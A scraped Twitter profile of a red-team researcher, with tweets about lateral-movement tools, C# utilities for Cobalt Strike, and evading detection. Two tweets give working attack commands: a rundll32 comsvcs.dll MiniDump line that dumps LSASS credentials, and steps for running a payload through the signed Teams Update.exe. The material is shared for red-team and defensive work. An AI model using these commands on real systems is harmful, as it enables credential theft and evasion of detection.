Mr.Un1k0d3r

@MrUn1k0d3r

I don't know how to search on Google so I do research on my own and tweet about it. Hacking as a life style

Joined: January 2012

Tweets


  1. Jan 13

    Released a little tool to perform lateral movement that hides the command you are executing by registering a protocol handler. The protocol handler is executed over WMI by simply running start customhandler:// ❤

  2. Retweeted
    Dec 9, 2019

    Trustwave Principal Consultant, , has announced the release of a new open source tool aimed at aiding Red Team engagements.

  3. Retweeted
    Dec 2, 2019

    Evading WinDefender ATP credential-theft: a hit after a hit-and-miss start. tl;dr PssCaptureSnapshot syscall clones the process then you don't need to do ReadProcessMemory against the original process and avoid LSASS read detection.

  4. Nov 19, 2019

    SCShell now has a Linux Python utility that relies on the impacket project. You can pass the hash too. Made a pull request to add it to the impacket project. ❤

  5. Nov 13, 2019

    Interesting way to move laterally using the service manager without registering a service or writing a file to disk. C# and PowerShell versions will be released soon. Thanks to ChangeServiceConfigA ❤

  6. Retweeted
    Nov 12, 2019

    NTLM reflection is back to haunt windows. Read about Ghost Potato here (this time with a fixed link):

  7. Oct 10, 2019

    This is major step for me. My online now have a real identity. ❤

  8. Sep 23, 2019

    More C# utilities. WMI utility allows you to run WMI queries directly in C#. Can be used with execute-assembly. ❤

  9. Sep 12, 2019

    Procdump alternative that may come handy during There is a C and a C# version that can be used with execute-assembly ❤

  10. Retweeted
    Sep 8, 2019

    | Exe Sideloading aka Exe proxying attack technique, Most of the / applications affected, No need of installation. Medium : Youtube : Thanks to ,

  11. Retweeted

    Without further delay, and I will now be releasing our Red Teamer's Guide to Pulse Secure SSL VPN.

  12. Retweeted
    Aug 30, 2019

    MiniDumpWriteDump via COM+ Services DLL (rundll32 C:\windows\system32\comsvcs.dll MiniDump "[lsass_pid] dump.bin full")

  13. Aug 7, 2019

    Come join me at 3PM at booth #1046 I will be presenting some interesting red team tricks that we are using during our red team engagements. See you soon ❤

  14. Aug 1, 2019

    LDAP utility written in C# that can be used with execute-assembly to query AD information. ❤

  15. Retweeted
    Jul 31, 2019

    Introducing InveighZero, a C# LLMNR/NBNS/mDNS/DNS spoofer/man-in-the-middle tool: Bonus, also just released Inveigh 1.5: Stop by the booth to learn more and get stickers😃

  16. Jul 31, 2019

    Apparently I will be in Las Vegas for my very first experience. I will be presenting some of my Red Team material at booth. Looking forward to meet some of you and 30000 billions grasshoppers. ❤

  17. Jul 11, 2019

    I've slowly started to port some of my tools to C# so it can be used with Cobalt Strike execute-assembly or standalone executable. LDAP query to get Active Directory data for now.

  18. Jul 8, 2019

    Keep in mind that most Electron apps expose the Updater.exe since it is part of the Electron ecosystem. Which means that popular apps such as Slack and Discord can be used too.

  19. Jul 8, 2019

    My official blog post regarding Teams Updater arbitrary execution. More details on the mitigation already in place regarding Teams Updater. Also why using %appdata% is bad. Much love to ❤

  20. Jun 26, 2019

    Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\ Then %userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "whatever args" Trusted signed binary will run the payload for you 😊

